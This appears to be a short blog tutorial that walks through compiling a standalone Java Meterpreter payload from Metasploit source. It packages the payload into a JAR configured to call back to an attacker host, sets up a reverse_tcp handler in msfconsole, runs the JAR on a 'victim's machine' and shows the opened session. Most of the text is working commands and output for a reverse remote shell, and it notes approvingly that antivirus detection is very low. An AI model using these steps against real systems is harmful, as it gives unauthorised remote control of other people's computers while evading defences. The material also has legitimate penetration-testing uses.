Standalone Java Meterpreter

The documentation out there on the web is somewhat out-of-date when it comes to compiling and executing a standalone Java Meterpreter payload, and as it's yet to become part of the core features of the Metasploit framework , I expect these steps to change again in the future. In the past you could use loader.jar to run the payload, though this is no longer included in the tree - instead, compile your own, using Payload.java (included in the tree):

Create the Meterpreter JAR:

cd ./external/source/javapayload/src/
javac -source 1.4 -target 1.4 metasploit/Payload.java
echo -e "LHOST=10.0.0.1\nLPORT=82" > metasploit.dat
jar cfe payload.jar metasploit.Payload metasploit/Payload.class metasploit.dat

Now to listen for the exploit in the Metasploit console:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(handler) > set LPORT 82
LPORT => 82
msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.0.1:82
[*] Starting the payload handler...

Launch the payload on the victim's machine:

java -jar payload.jar

Wait for the results:

[*] Sending stage (28541 bytes) to 192.168.0.1
[*] Meterpreter session 1 opened (10.0.0.1:82 -> 192.168.0.1:54562) at 2012-03-21 09:53:20 +0000

Pros:

• AV detection is very low
• Most boxes have Java installed
• It works

Cons:

• Limited post exploitation modules can be run
• Not as functional as a shell-code meterpreter session.